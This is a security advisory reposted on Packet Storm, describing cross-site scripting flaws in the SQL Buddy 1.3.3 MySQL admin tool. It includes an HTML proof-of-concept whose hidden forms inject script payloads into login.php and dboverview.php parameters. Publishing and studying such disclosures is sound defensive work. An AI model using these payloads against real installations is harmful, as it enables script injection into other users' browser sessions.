SQL Buddy version 1.3.3 suffers from multiple cross site scripting vulnerabilities.
488ee75a73a61a76043ef5e64e80dfb3<!--
SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities
Vendor: Calvin Lough
Product web page: http://www.sqlbuddy.com
Affected version: 1.3.3
Summary: SQL Buddy is an open source web based MySQL administration application.
Desc: SQL Buddy suffers from a XSS vulnerability when parsing user input to the
'DATABASE', 'HOST' and 'USER' parameters via POST method in 'login.php', and the
'db' parameter in 'dboverview.php' via GET method. Attackers can exploit these
weaknesses to execute arbitrary HTML and script code in a user's browser session.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.9
MySQL 5.5.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2012-5074
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5074.php
CWE-79: http://cwe.mitre.org/data/definitions/79.html
13.02.2012
-->
<html>
<title>SQL Buddy 1.3.3 (GET/POST) Multiple Remote Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss(){document.forms["xss"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://localhost/sqlbuddy/login.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="HOST" value='"><script>alert(1)</script>' />
<input type="hidden" name="USER" value='"><script>alert(2)</script>' />
<input type="hidden" name="DATABASE" value='"><script>alert(3)</script>' />
</form>
<!-- [post-auth (get)] -->
<form action="http://localhost/sqlbuddy/dboverview.php" method="GET" id="xss2">
<input type="hidden" name="db" value='1"><script>alert(1)</script>' />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>POST Method Exploit!</h3></font></b></a><br /><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>GET Method Exploit!</h3></font></b></a><br /><br />
<br /><br /><br /><br /><font color="gray">© 2012.</font>
<a href="http://www.zeroscience.mk" target="_blank" style="text-decoration:none">
<font color="gray">Zero Science Lab</a></font></center>
</body></html>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!